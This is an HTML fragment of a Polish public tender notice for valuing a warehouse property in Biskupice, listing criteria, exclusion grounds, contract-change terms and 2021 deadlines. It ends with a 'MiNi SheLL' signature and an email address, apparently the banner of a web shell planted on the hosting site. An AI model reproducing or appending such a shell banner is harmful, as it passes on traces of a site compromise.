roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia dot. wyceny pierwotnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2)	Zadanie częściowe nr 2<br/>Wycena nieruchomości zabudowanej, położonej w obrębie Biskupice, gm. Byczyna, pow. kluczborski, przeznaczonej w studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy na cele działalności gospodarczej – produkcji, składów, magazynów i usług (PU), oznaczonej <br/>w ewidencji gruntów i budynków jako dz. nr 29/32, 29/16 z a.m. 5 o łącznej pow. 0,4096 ha, <br/>w skład której wchodzi budynek o nazwie „Magazyn farb obr. Biskupice, dz. nr 29/32 z k.m. 5” – nr inw. 88/187, dla której w Sądzie Rejonowym w Kluczborku prowadzona jest księga wieczysta nr OP1U/00046981/4. <br/>Przez działki przebiega sieć elektroenergetyczna, wodociągowa.<br/>W operacie szacunkowym należy wyodrębnić:<br/>-	wartość gruntu,<br/>- wartość budynków i budowli,<br/>- wartość drzewostanu – wg. oceny rzeczoznawcy,<br/><br/>Pozostałe informacje: <br/>•	Wycenę należy sporządzić w formie operatu szacunkowych w jednym egzemplarzu, <br/>•	Na działce nr 29/32 znajduje się środek trwały o nazwie „Magazyn farb obr. Biskupice, dz. nr 29/32 z k.m. 5” – nr inw. 88/187<br/>•	Zamawiający udostępni wykonawcy:<br/>- numery ksiąg wieczystych dotyczących nieruchomości będących przedmiotem wyceny lub innych dokumentów potwierdzających prawo własności Skarbu Państwa w przypadku braku KW,<br/>- kserokopię informacji/wypisu/zaświadczenia o przeznaczeniu nieruchomości <br/>w planie zagospodarowania przestrzennego lub w studium uwarunkowań,<br/>- wykaz środków trwałych z ewidencji środków trwałych KOWR,<br/>- dane z ewidencji gruntów i budynków ze starostwa powiatowego właściwego, co do położenia nieruchomości – tj. kopię wypisu z rejestru gruntów oraz wyrysu z mapy ewidencyjnej, ewentualnie kopii mapy ewidencyjnej, kopii mapy zasadniczej, itp.,<br/>•	Wykonawca przekazuje zamawiającemu operat szacunkowy protokołem zdawczo – odbiorczym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1)	Przedmiot zamówienia obejmuje sporządzenie wyceny zwanej dalej wycenę pierwotną oraz opcję jej ponownego wykonania. <br/>2)	Opcję ponownego wykonania wyceny należy rozumieć jako prawo Zamawiającego, ale nie obowiązek, do zlecenia ponownego wykonania wyceny/operatu szacunkowego. <br/>3)	Wykonawca wykona wycenę pierwotną oraz gwarantuje Zamawiającemu jej ponowne wykonanie. Nie skorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy do dochodzenia przez Wykonawcę jakiegokolwiek roszczenia ani odszkodowania z tego tytułu. <br/>4)	W przypadku kiedy operat szacunkowy, wg oceny Zamawiającego, będzie wymagał potwierdzenia aktualności w trybie art. 156 ust. 4 ustawy o gospodarce nieruchomościami <br/>i § 58 rozporządzenia w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego, bądź sporządzenia ponownego operatu, Wykonawca zobowiązuje się do wykonania analizy rynku nieruchomości i sprawdzenia istotnych czynników mających wpływ na określenie wartości. <br/>5)	Po przeprowadzeniu analizy o której mowa powyżej Wykonawca sporządza: <br/>a) klauzulę o aktualności, za którą przysługiwać będzie Wykonawcy wynagrodzenie brutto <br/>w wysokości 10% wynagrodzenia brutto otrzymanego za pierwotną wycenę, <br/> bądź <br/>b) nowy operat szacunkowy, z nową datą, z uwzględnieniem zmian wynikających z analizy, <br/>o której mowa w pkt 4, za który przysługiwać będzie Wykonawcy wynagrodzenie brutto <br/>w wysokości 35% wynagrodzenia brutto otrzymanego za pierwotną wycenę. <br/>6)	Realizacja zamówienia opcjonalnego odbędzie się na podstawie informacji (zlecenia) określającego w szczególności przedmiot zamówienia, termin wykonania oraz wysokość wynagrodzenia określonego na podstawie §6 ust. 2 lub 3 umowy, którą Zamawiający przekaże Wykonawcy za pośrednictwem komunikacji elektronicznej lub za pośrednictwem operatora pocztowego za zwrotnym potwierdzeniem odbioru bądź Wykonawca odbierze je osobiście <br/>u Zamawiającego. <br/>7)	Decyzja o realizacji lub rezygnacji z zamówienia opcjonalnego jest wyłącznym uprawnieniem Zamawiającego. Szczegóły dotyczące prawa opcji zawierają Projektowane postanowienia umowy stanowiące załącznik nr 3 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">22 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia dot. wyceny pierwotnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> warunki udziału w postępowaniu, dotyczące: zdolności technicznej lub zawodowej.<br/>Warunek ten Zamawiający uzna za spełniony, jeżeli Wykonawca wykaże Zamawiającemu, że<br/>dysponuje co najmniej jedną osobą, która będzie brała udział w realizacji zamówienia,<br/>posiadającą wymagane uprawnienia w zakresie szacowania nieruchomości <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji<br/>oDziałalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie<br/>wcześniejniż 3 miesiące przed jego złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz osób (załącznik nr 4 do SWZ) skierowanych przez Wykonawcę do<br/>realizacji zamówienia publicznego (co najmniej jedna osoba posiadająca wymagane uprawnienia<br/>w zakresie szacowania nieruchomości), w szczególności odpowiedzialnych za świadczenie usług, wraz<br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów – w przypadku gdy Wykonawca polega na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby, w celu spełnienia warunku udziału<br/>w postępowaniu - wzór zobowiązania stanowi załącznik nr 5 do SWZ,<br/>2) oświadczenie wynikające z art. 117 ust 4 ustawy Pzp, o którym mowa w rozdziale VIII ust. 8.2<br/>pkt 2) SWZ - w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców - wzór<br/>oświadczenia stanowi załącznik nr 6 do SWZ.<br/>3) w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania - odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji<br/>Informacji o Działalności Gospodarczej lub innego właściwego rejestru, chyba że Zamawiający<br/>może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca<br/>wskazał dane umożliwiające dostęp do tych dokumentów, z zastrzeżeniem ust. 16.8. swz.<br/>Powyższy wymóg stosuje się również odpowiednio do osoby działającej w imieniu podmiotu<br/>udostępniającego zasoby na zasadach określonych w art. 118 ustawy oraz do podwykonawcy.<br/>4) pełnomocnictwo, jeżeli Wykonawca samodzielnie składający ofertę jest reprezentowany przez<br/>pełnomocnika;<br/>5) w przypadku Wykonawców wspólnie ubiegających się o zamówienie – pełnomocnictwo do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (możliwość składania<br/>jednej oferty, przez dwa lub więcej podmiotów), pod warunkiem, że taka oferta będzie spełniać<br/>następujące wymagania:<br/>1) Wykonawcy wspólnie ubiegający się o zamówienie, zgodnie z art. 58 ust 2 ustawy Pzp muszą<br/>ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - nie<br/>dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki<br/>wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę;<br/>2) Wykonawcy tworzący jeden podmiot przedłożą wraz z ofertą stosowne pełnomocnictwo - nie<br/>dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki<br/>wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę; UWAGA:<br/>pełnomocnictwo, o którym mowa powyżej (pkt 1 i 2) może wynikać albo z dokumentu pod taką<br/>samą nazwą, albo z umowy podmiotów wspólnie składających ofertę;<br/>3) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich<br/>Wykonawców występujących wspólnie (przez każdego z Wykonawców lub pełnomocnika);<br/>4) Wszelka korespondencja dokonywana będzie wyłącznie z Wykonawcą występującym jako<br/>Pełnomocnik pozostałych;<br/>5) Wskazanie lidera w druku oferty (w przypadku oferty złożonej przez konsorcjum);<br/>10.2. W przypadku gdy oferta wspólna Wykonawcy zostanie najwyżej oceniona, Wykonawca<br/>przed udzieleniem zamówienia, składa na wezwanie Zamawiającego dokumenty o których<br/>mowa w rozdziale IX ust. 9.4. SWZ, przy czym dokumenty wymienione w rozdziale IX ust. 9.4.<br/>pkt 1) SWZ składa odrębnie każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>10.3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia żaden z<br/>nich nie może podlegać wykluczeniu z postępowania na podst. art. 108 ust. 1 oraz art. 109. ust.<br/>1 pkt 4, 5 i 7 ustawy Pzp.<br/>10.4. Nie dopuszcza się uczestniczenia danego Wykonawcy w więcej niż jednej grupie<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Niedopuszczalnym również<br/>jest złożenie przez jednego Wykonawcę równocześnie oferty indywidualnej oraz w ramach grupy<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>10.5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy.<br/>10.6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. W tym przypadku Wykonawca wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, o którym mowa w art. 117 ust. 4<br/>ustawy Pzp, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni Wykonawcy – wzór oświadczenia stanowi załącznik nr 6 do SWZ (forma złożenia<br/>oświadczenia została opisana w ust. 16.5. i 16.6. SWZ) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 21.2.	Dopuszcza się zmianę postanowień zawartej umowy w stosunku do treści oferty, w przypadku wystąpienia co najmniej jednej z następujących okoliczności:<br/>1)	nastąpi zmiana przeznaczenia nieruchomości w związku ze zmianą miejscowego planu zagospodarowania lub studium uwarunkowań i kierunków zagospodarowania;<br/>2)	zmiana zakresu przedmiotu zamówienia z uwagi na przekazanie lub konieczność przekazania nieruchomości lub jej części na rzecz instytucji samorządowych lub innych;<br/>3)	zmiana numerów działek składających się na wycenianą nieruchomość;<br/>4)	geodezyjna zmiana powierzchni wycenianej nieruchomości;<br/>5)	zwiększenie powierzchni wycenianej nieruchomości, nie więcej niż o 10%; <br/>6)	zmniejszenie powierzchni wycenianej nieruchomości; <br/>7)	w przypadku ujawnienia środków trwałych nieujętych w ewidencji KOWR;<br/>8)	wykonanie przedmiotu umowy stanie się zbędne dla Zamawiającego ze względu na jego właściwość lub przeznaczenie albo gdy jego realizacja przez Wykonawcę będzie niemożliwa do wykonania z przyczyn nie dających się przewidzieć w chwili zawarcia umowy. W takim przypadku, Wykonawcy przysługuje zwrot jedynie faktycznie poniesionych kosztów realizacji. <br/>21.3.	Dopuszcza się zmianę umownego terminu realizacji, w przypadku wystąpienia co najmniej jednej <br/>z następujących okoliczności:<br/>1)	w przypadku opóźnienia w przekazaniu przez Zamawiającego przewidzianego w umowie kompletu dokumentów dla Wykonawcy - wydłużenie umowy nastąpi jedynie o czas spowodowany opóźnieniem;<br/>2)	zmiany spowodowane działaniem osób trzecich, w wyniku których wykonanie przedmiotu umowy będzie niemożliwe bądź utrudnione, a działania te nie są konsekwencją winy którejkolwiek ze Stron - wydłużenie umowy nastąpi jedynie o czas spowodowany opóźnieniem;<br/>3)	wystąpienia warunków siły wyższej – przez którą należy rozumieć wystąpienie zdarzeń <br/>i okoliczności, na które Strony nie mają wpływu i przed którymi nie mogły się zabezpieczyć, w tym w szczególności udokumentowane warunki atmosferyczne uniemożliwiające przeprowadzenie rzetelnej lustracji wycenianej nieruchomości, epidemie i inne klęski - które uniemożliwiły wykonanie Umowy w dotychczas ustalonym terminie;<br/>4)	zmiany będące następstwem działania organów administracji, a w szczególności: <br/>a)	przekroczenie określonych przez prawo terminów wydawania przez osoby trzecie wypisów, wyrysów, opinii, decyzji, zaświadczeń itp. skutkujące niemożnością wykonania zamówienia, a opóźnienie organów nie wynika z przyczyn leżących po stronie Wykonawcy, <br/>b)	przystąpienie przez gminę do opracowania nowego planu zagospodarowania przestrzennego lub studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy.<br/>21.4.	Dopuszcza się zmianę osób odpowiedzialnych za wykonanie zamówienia z zastrzeżeniem, że wprowadzona zmiana nie może skutkować zmianą Wykonawcy zamówienia: <br/>1)	zmiana osób przy pomocy, których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w SWZ,<br/>2)	zmiany kluczowego personelu Wykonawcy na skutek zdarzeń losowych, zmian kadrowo-personalnych, utraty wymaganych uprawnień, utraty stanowiska. Zmiana kluczowego personelu Wykonawcy może nastąpić wyłącznie pod warunkiem okazania uprawnień co najmniej równoważnych.<br/>21.5.	Zmiany, o których mowa powyżej, nie będą stanowić podstawy zwiększenia wynagrodzenia.<br/>21.6.	Powyższe postanowienia stanowią katalog zmian, na które Zamawiający dopuszcza zgodę, nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody przez Zamawiającego. <br/>21.7.	O wystąpieniu okoliczności, które mogą mieć wpływ na zmiany wprowadzane w umowie, Wykonawca zobowiązany jest niezwłocznie informować Zamawiającego pisemnie.<br/>21.8.	Wniosek Wykonawcy o dokonanie zmiany umowy musi być uzasadniony, a okoliczności na które powołuje się Wykonawca muszą być udokumentowane.<br/>Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zostały<br/>szczegółowo opisane w PPU - załącznik nr 3 do SWZ oraz w rozdziale XXI SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-15 09:45</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi załącznikami należy złożyć za pośrednictwem platformy zakupowej dostępnej pod adresem https://kowr.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-15 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin realizacji zamówienia, oprócz ceny brutto, stanowi kryterium wyboru oferty.<br/>Wykonawca w druku oferty (zał. nr 1 do SWZ) deklaruje termin wykonania zamówienia, który nie<br/>może być krótszy niż 14 dni i nie może być dłuższy niż 22 dni.<br/>W przypadku gdy Wykonawca<br/>wpisze termin krótszy niż 14 dni bądź dłuższy niż 22 dni, Zamawiający odrzuci ofertę jako<br/>niezgodną z warunkami zamówienia

Creat By MiNi SheLL
Email: jattceo@gmail.com